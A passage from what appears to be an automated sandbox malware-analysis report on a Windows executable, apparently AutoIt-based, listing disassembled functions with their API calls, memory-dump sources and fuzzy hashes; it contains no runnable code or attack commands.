                                                  • Opcode Fuzzy Hash: 2ddb175780e8b079bb117d1a9f61ac6c6341059d57fa3df29ad2180dd051c61b
                                                  • Instruction Fuzzy Hash: E1115A79900218FFEB10DFA5CC84FADBBB8FB48710F2040A5EA00B7290DA716E11DB94
                                                  Function 00BF1290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BF2612: GetWindowLongW.USER32(?,000000EB), ref: 00BF2623
                                                  • DefDlgProcW.USER32(?,00000020,?), ref: 00BF12D8
                                                  • GetClientRect.USER32(?,?), ref: 00C2B5FB
                                                  • GetCursorPos.USER32(?), ref: 00C2B605
                                                  • ScreenToClient.USER32(?,?), ref: 00C2B610
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Client$CursorLongProcRectScreenWindow
                                                  • String ID:
                                                  • API String ID: 4127811313-0
                                                  • Opcode ID: 30279f4807a6e972a000896e6077eb374de1e50848631f5d706ae44533faab5f
                                                  • Instruction ID: 7929e8a6b9a3f2ce14f39b51dab40e872e61ac61d2e6162c8d99df65f1277b80
                                                  • Opcode Fuzzy Hash: 30279f4807a6e972a000896e6077eb374de1e50848631f5d706ae44533faab5f
                                                  • Instruction Fuzzy Hash: 10112835A0001DEFCB00EFA8D885AFE77F8FB05310F400895FA01E7140C731AA969BA5
                                                  Function 00C51142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00C4FCED,?,00C50D40,?,00008000), ref: 00C5115F
                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00C4FCED,?,00C50D40,?,00008000), ref: 00C51184
                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00C4FCED,?,00C50D40,?,00008000), ref: 00C5118E
                                                  • Sleep.KERNEL32(?,?,?,?,?,?,?,00C4FCED,?,00C50D40,?,00008000), ref: 00C511C1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CounterPerformanceQuerySleep
                                                  • String ID:
                                                  • API String ID: 2875609808-0
                                                  • Opcode ID: 1d3452b8fc7cb9b14c0e6c8f7fb54207d99b5c4ffdea369350e8d5cdf9cc8e42
                                                  • Instruction ID: 666e09c3070a430f0cd547ddd4b0fb415fd34c5e180fe45d996747afc9f7a0aa
                                                  • Opcode Fuzzy Hash: 1d3452b8fc7cb9b14c0e6c8f7fb54207d99b5c4ffdea369350e8d5cdf9cc8e42
                                                  • Instruction Fuzzy Hash: D0114835C00918E7CF009FA5D888BEEBB78FB19712F444099EE45B6240CA7096D4CBA9
                                                  Function 00C4D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00C4D84D
                                                  • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00C4D864
                                                  • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00C4D879
                                                  • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00C4D897
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Type$Register$FileLoadModuleNameUser
                                                  • String ID:
                                                  • API String ID: 1352324309-0
                                                  • Opcode ID: efb38778bbc08293dd19fbc9adc1f9b010cee34b494282d2448954126c1dea17
                                                  • Instruction ID: f1a6a29b9c9bd1f0448f3fe35ee8948613ee583b013d29c89a526bd44383e62f
                                                  • Opcode Fuzzy Hash: efb38778bbc08293dd19fbc9adc1f9b010cee34b494282d2448954126c1dea17
                                                  • Instruction Fuzzy Hash: A3115E75605304DBE7209F51EC48FA6BBBCFB00B00F10856DA91AD6590D7B0E589DBE1
                                                  Function 00C26FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                  • String ID:
                                                  • API String ID: 3016257755-0
                                                  • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                  • Instruction ID: 29a08eb5131cb32f72a6b1948bb953f23396c9f165bac70e3ccbd7b8d45ef46a
                                                  • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                  • Instruction Fuzzy Hash: 2401407244415ABBCF165F84EC86CEE3F62BB18350F588615FE2858831D636CAB5BB81
                                                  Function 00C7B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetWindowRect.USER32(?,?), ref: 00C7B2E4
                                                  • ScreenToClient.USER32(?,?), ref: 00C7B2FC
                                                  • ScreenToClient.USER32(?,?), ref: 00C7B320
                                                  • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C7B33B
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ClientRectScreen$InvalidateWindow
                                                  • String ID:
                                                  • API String ID: 357397906-0
                                                  • Opcode ID: a8f99b7c87b27806c2af2d1f407eb6fce2056f69b6f9a2b6859e5e8ed37fffbf
                                                  • Instruction ID: 4b4212e077538a0a55b5fb2dc64d67cb688a8acfea0a5e4519ec1da95b153a5c
                                                  • Opcode Fuzzy Hash: a8f99b7c87b27806c2af2d1f407eb6fce2056f69b6f9a2b6859e5e8ed37fffbf
                                                  • Instruction Fuzzy Hash: F7114675D00209EFDB41DFA9C884AEEFBB5FB08310F108166E914E3220D735AA558F50
                                                  Function 00C7B635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C7B644
                                                  • _memset.LIBCMT ref: 00C7B653
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00CB6F20,00CB6F64), ref: 00C7B682
                                                  • CloseHandle.KERNEL32 ref: 00C7B694
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _memset$CloseCreateHandleProcess
                                                  • String ID:
                                                  • API String ID: 3277943733-0
                                                  • Opcode ID: c472774ae0098cd8f4823fc2138daf926717e2d594cfff804d3528f707bf05fc
                                                  • Instruction ID: dd8b9964a9dde7f812179f77d4240cd40d053d9dbfe4e7a65ec807eeb8a97008
                                                  • Opcode Fuzzy Hash: c472774ae0098cd8f4823fc2138daf926717e2d594cfff804d3528f707bf05fc
                                                  • Instruction Fuzzy Hash: 65F03AF25403007AE7102BA1FC46FBF3B9CEB09395F004024BA0CE61A2D7794C11D7A8
                                                  Function 00C56BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • EnterCriticalSection.KERNEL32(?), ref: 00C56BE6
                                                    • Part of subcall function 00C576C4: _memset.LIBCMT ref: 00C576F9
                                                  • _memmove.LIBCMT ref: 00C56C09
                                                  • _memset.LIBCMT ref: 00C56C16
                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00C56C26
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection_memset$EnterLeave_memmove
                                                  • String ID:
                                                  • API String ID: 48991266-0
                                                  • Opcode ID: c4742bf802b8f2da6e98157e6870ca6c23b4d6f2a4be5020f69e1dfef82a451c
                                                  • Instruction ID: f0f680d648663cdbcaaef0f1257095babe31502e3c12104d55ed10f8d907d28d
                                                  • Opcode Fuzzy Hash: c4742bf802b8f2da6e98157e6870ca6c23b4d6f2a4be5020f69e1dfef82a451c
                                                  • Instruction Fuzzy Hash: 67F0543A100100ABCF016F55EC85B8ABF29EF45361F048065FE089E227CB31E895EBB4
                                                  Function 00BF2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetSysColor.USER32(00000008), ref: 00BF2231
                                                  • SetTextColor.GDI32(?,000000FF), ref: 00BF223B
                                                  • SetBkMode.GDI32(?,00000001), ref: 00BF2250
                                                  • GetStockObject.GDI32(00000005), ref: 00BF2258
                                                  • GetWindowDC.USER32(?,00000000), ref: 00C2BE83
                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 00C2BE90
                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 00C2BEA9
                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 00C2BEC2
                                                  • GetPixel.GDI32(00000000,?,?), ref: 00C2BEE2
                                                  • ReleaseDC.USER32(?,00000000), ref: 00C2BEED
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                  • String ID:
                                                  • API String ID: 1946975507-0
                                                  • Opcode ID: bbcebe1769e85740f6fcb7ff470c34ee5d04e1fc96fce577727481d52e735f0d
                                                  • Instruction ID: 26b9fd88936b0b8bd79b1248b640c91fa0b3ad3fd2cc0e8a552b0e86a3916b2e
                                                  • Opcode Fuzzy Hash: bbcebe1769e85740f6fcb7ff470c34ee5d04e1fc96fce577727481d52e735f0d
                                                  • Instruction Fuzzy Hash: 25E03932104244ABDB215FA4FC8D7DC3B20EB05332F00836AFA7D980E187B14AC1DB12
                                                  Function 00C48712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentThread.KERNEL32 ref: 00C4871B
                                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,00C482E6), ref: 00C48722
                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00C482E6), ref: 00C4872F
                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,00C482E6), ref: 00C48736
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CurrentOpenProcessThreadToken
                                                  • String ID:
                                                  • API String ID: 3974789173-0
                                                  • Opcode ID: 265f2c5f6a4fe7245339f2455bb1b760acd2aa05dbb73c648611fa17676e62ea
                                                  • Instruction ID: 1f6727bf11fa3f18e1bbe74ca9d488b6e3d867bfcc4e8a69f977fefe82c3b932
                                                  • Opcode Fuzzy Hash: 265f2c5f6a4fe7245339f2455bb1b760acd2aa05dbb73c648611fa17676e62ea
                                                  • Instruction Fuzzy Hash: E2E086366152119BD7205FB05D8CB5E3BACFF50B91F14482CB249CA051DA748486C750
                                                  Function 00C4B2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OleSetContainedObject.OLE32(?,00000001), ref: 00C4B4BE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ContainedObject
                                                  • String ID: AutoIt3GUI$Container
                                                  • API String ID: 3565006973-3941886329
                                                  • Opcode ID: ae0c1324b9eb1b35685ca1892cef6e87378ffe93ce0df10446bd118873a84366
                                                  • Instruction ID: 55ee5eb0e05eb083e3726b993b5d53aab20aaf6748e8d7a69559284c80e070c2
                                                  • Opcode Fuzzy Hash: ae0c1324b9eb1b35685ca1892cef6e87378ffe93ce0df10446bd118873a84366
                                                  • Instruction Fuzzy Hash: C9913870600602AFDB14DF65C884B6ABBE9FF49714F20856DE94ACB2A1DB70ED41CB60
                                                  Function 00C5AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C0FC86: _wcscpy.LIBCMT ref: 00C0FCA9
                                                    • Part of subcall function 00BF9837: __itow.LIBCMT ref: 00BF9862
                                                    • Part of subcall function 00BF9837: __swprintf.LIBCMT ref: 00BF98AC
                                                  • __wcsnicmp.LIBCMT ref: 00C5B02D
                                                  • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00C5B0F6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                  • String ID: LPT
                                                  • API String ID: 3222508074-1350329615
                                                  • Opcode ID: e923b18f935d4e3f3fe45c70a64f5bec303c28638937d7ba9c1a934c13baaf3b
                                                  • Instruction ID: 529a66a285180e0cfb2975c0542ba721c44a5f57f446a7af0cae49fd781fca33
                                                  • Opcode Fuzzy Hash: e923b18f935d4e3f3fe45c70a64f5bec303c28638937d7ba9c1a934c13baaf3b
                                                  • Instruction Fuzzy Hash: 6A619275A00219AFCB14DF94C891EBFBBF4EF48350F1040A9F916AB291D770AE89CB54
                                                  Function 00C02957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Sleep.KERNEL32(00000000), ref: 00C02968
                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 00C02981
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemorySleepStatus
                                                  • String ID: @
                                                  • API String ID: 2783356886-2766056989
                                                  • Opcode ID: 74474c7b9af9e02a3e51acff8ce82c14abac8b568be533042845989fead5dece
                                                  • Instruction ID: 79290a978cfab2093a18c1899c0630f7ed64447aa833014470b656dd0f731aeb
                                                  • Opcode Fuzzy Hash: 74474c7b9af9e02a3e51acff8ce82c14abac8b568be533042845989fead5dece
                                                  • Instruction Fuzzy Hash: 795139714187489BD720EF10D886BAFBBE8FF85354F42489DF2D8421A1DB31856DCB66
                                                  Function 00C59734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BF4F0B: __fread_nolock.LIBCMT ref: 00BF4F29
                                                  • _wcscmp.LIBCMT ref: 00C59824
                                                  • _wcscmp.LIBCMT ref: 00C59837
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _wcscmp$__fread_nolock
                                                  • String ID: FILE
                                                  • API String ID: 4029003684-3121273764
                                                  • Opcode ID: 175854ae98008a32e876694b573191549ccea31c5e35d33632b28486523a2f96
                                                  • Instruction ID: 66f1503b8bc923f64719d20134e1ebc19983427b5cdaffa3e3b06400e77ff921
                                                  • Opcode Fuzzy Hash: 175854ae98008a32e876694b573191549ccea31c5e35d33632b28486523a2f96
                                                  • Instruction Fuzzy Hash: F741D875A00219BBDF209AA4CC45FEFB7FDDF86714F0004A9FA05A7180DB719A489B65
                                                  Function 00C6258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C6259E
                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00C625D4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CrackInternet_memset
                                                  • String ID: |
                                                  • API String ID: 1413715105-2343686810
                                                  • Opcode ID: f04af8b5ea15c04f1e21ec77fb951fd19899e4c0755a474e0315dfa973b3a3b3
                                                  • Instruction ID: cb41282a7a033a0f4e3f8333ee0f3746abb205cdc675cca400530d8d0de423c8
                                                  • Opcode Fuzzy Hash: f04af8b5ea15c04f1e21ec77fb951fd19899e4c0755a474e0315dfa973b3a3b3
                                                  • Instruction Fuzzy Hash: 39310A71814119EBCF11EFA5CC85EEEBFB8FF08310F1000A9F915A6162DB319A56DB60
                                                  Function 00C77A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00C77B61
                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C77B76
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: '
                                                  • API String ID: 3850602802-1997036262
                                                  • Opcode ID: 665ec43578490f03e96a0223a40825b962ee9be63dbdda0abcd0046b1ec76bad
                                                  • Instruction ID: f02173879f713b9d94484355a6342ff8035f78cfa162c95889bba585a8566fdc
                                                  • Opcode Fuzzy Hash: 665ec43578490f03e96a0223a40825b962ee9be63dbdda0abcd0046b1ec76bad
                                                  • Instruction Fuzzy Hash: C0412874A0430D9FDB14CF65C981BEEBBB5FB08310F10426AE918AB381D771AA51DF90
                                                  Function 00C76A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DestroyWindow.USER32(?,?,?,?), ref: 00C76B17
                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00C76B53
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
